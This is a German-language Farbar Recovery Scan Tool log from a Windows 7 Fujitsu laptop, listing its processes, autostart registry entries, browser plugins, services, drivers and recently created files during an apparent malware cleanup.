Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 24-05-2017
durchgeführt von Markus (Administrator) auf MARKUS-PC (25-05-2017 22:01:33)
Gestartet von C:\FRST\FRST-OlderVersion
Geladene Profile: Markus (Verfügbare Profile: Markus)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe
(HP) C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\HelperService.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\ConversionService.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\MBAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Malwarebytes) C:\Program Files\Malwarebytes\mbamtray.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(Fujitsu Technology Solutions) C:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe
(shbox.de) C:\Program Files (x86)\FreePDF_XP\fpassist.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(PortableApps.com) F:\Firefox Plus\FirefoxPortable.exe
(Mozilla Corporation) F:\Firefox Plus\App\Firefox\firefox.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2816808 2011-08-11] (Synaptics Incorporated)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-24] (FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [205168 2011-10-03] (FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [HP LaserJet 200 color MFP M276 Series Fax] => C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe [3706424 2011-10-09] (Hewlett-Packard Company)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-01-17] (Intel Corporation)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-30] (FUJITSU LIMITED)
HKLM-x32\...\Run: [DeskUpdateNotifier] => c:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe [101144 2015-06-15] (Fujitsu Technology Solutions)
HKLM-x32\...\Run: [YouCam Service] => "C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe" /s
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [FreePDF Assistant] => C:\Program Files (x86)\FreePDF_XP\fpassist.exe [371200 2011-02-23] (shbox.de)
HKLM-x32\...\Run: [StatusAlerts] => C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe [313248 2012-07-18] (Hewlett-Packard Company)
HKLM-x32\...\Run: [FUJ02B1_Apps] => C:\Program Files (x86)\Fujitsu\FUJ02B1\CheckBatteryPack.exe [367424 2016-05-11] (FUJITSU LIMITED)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27219928 2016-11-15] (Skype Technologies S.A.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-02-09] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [153208 2016-02-09] (NVIDIA Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2012-01-26]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: 0.0.0.1	mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.188.1
Tcpip\..\Interfaces\{1EDD786C-676B-4E94-B44B-9E94A619AFFB}: [DhcpNameServer] 192.168.188.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: PDF Architect Helper -> {3A2D5EBA-F86D-4BD3-A177-019765996711} -> C:\Program Files (x86)\PDF Architect\PDFIEHelper.dll [2013-04-08] (pdfforge GmbH)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2016-09-23] (Skype Technologies)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: tuoa89rc.default
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\tuoa89rc.default [2017-05-25]
FF Homepage: Mozilla\Firefox\Profiles\tuoa89rc.default -> rp-online.
FF HKLM-x32\...\Firefox\Extensions: [FFPDFArchitectConverter@pdfarchitect.com] - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt
FF Extension: (PDF Architect Converter For Firefox) - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt [2017-04-27] [ist nicht signiert]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-13] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-13] ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll [2008-10-15] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.52 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AAV UpdateService; C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe [128296 2008-10-24] ()
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (DTS, Inc)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-24] (FUJITSU LIMITED)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 HP DS Service; C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe [13824 2011-10-17] (Hewlett-Packard Company) [Datei ist nicht signiert]
R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [164864 2012-05-02] (HP) [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2011-12-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2011-12-08] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 PDF Architect Helper Service; C:\Program Files (x86)\PDF Architect\HelperService.exe [1320496 2013-04-08] (pdfforge GmbH)
R2 PDF Architect Service; C:\Program Files (x86)\PDF Architect\ConversionService.exe [799280 2013-04-08] (pdfforge GmbH)
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [Datei ist nicht signiert]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [63856 2011-10-03] (FUJITSU LIMITED)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [594704 2011-12-08] (Intel® Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [134696 2011-11-23] (Broadcom Corporation.)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [59152 2016-05-11] (FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\system32\drivers\FUJ02E3.sys [7296 2006-11-01] (FUJITSU LIMITED)
S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (HTC, Corporation) [Datei ist nicht signiert]
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-05-25] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [43968 2017-05-25] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-25] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-05-25] (Malwarebytes)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-25 21:51 - 2017-05-25 21:51 - 00000985 _____ C:\Users\Markus\Desktop\AdwCleaner_6.046.lnk
2017-05-25 21:44 - 2017-05-25 21:44 - 00000000 ____D C:\Users\Markus\AppData\Local\{DC104DB5-E812-4806-8E79-5424BA963F2F}
2017-05-22 21:32 - 2017-05-22 21:32 - 00001109 _____ C:\Users\Markus\Desktop\mbar.lnk
2017-05-22 17:34 - 2017-05-25 21:55 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-05-22 17:34 - 2017-05-25 21:55 - 00084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-05-22 17:34 - 2017-05-25 21:55 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-05-22 17:34 - 2017-05-22 17:34 - 00001688 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 17:34 - 2017-05-22 17:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 17:34 - 2017-05-22 17:34 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 17:34 - 2017-05-09 16:37 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-05-21 19:34 - 2017-05-25 21:52 - 00000000 ____D C:\AdwCleaner
2017-05-21 08:41 - 2017-05-25 21:55 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-05-21 08:41 - 2017-05-24 19:29 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-05-21 08:41 - 2017-05-22 17:34 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-21 08:40 - 2017-05-22 17:34 - 00187320 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-05-21 08:39 - 2017-05-22 17:31 - 00000000 ____D C:\Anti Malware
2017-05-20 17:24 - 2017-05-20 17:24 - 00000085 _____ C:\Windows\wininit.ini
2017-05-18 17:24 - 2017-05-25 22:01 - 00000000 ____D C:\FRST
2017-05-18 17:24 - 2017-05-18 17:24 - 02429952 _____ (Farbar) C:\Users\Markus\Downloads\FRST64.exe
2017-05-17 14:15 - 2017-05-17 14:15 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-13 20:30 - 2017-05-13 20:30 - 00000000 ____D C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
2017-05-13 19:31 - 2017-05-13 19:31 - 05821944 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 05547240 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-05-10 15:56 - 2017-04-28 03:14 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-05-10 15:56 - 2017-04-28 03:11 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
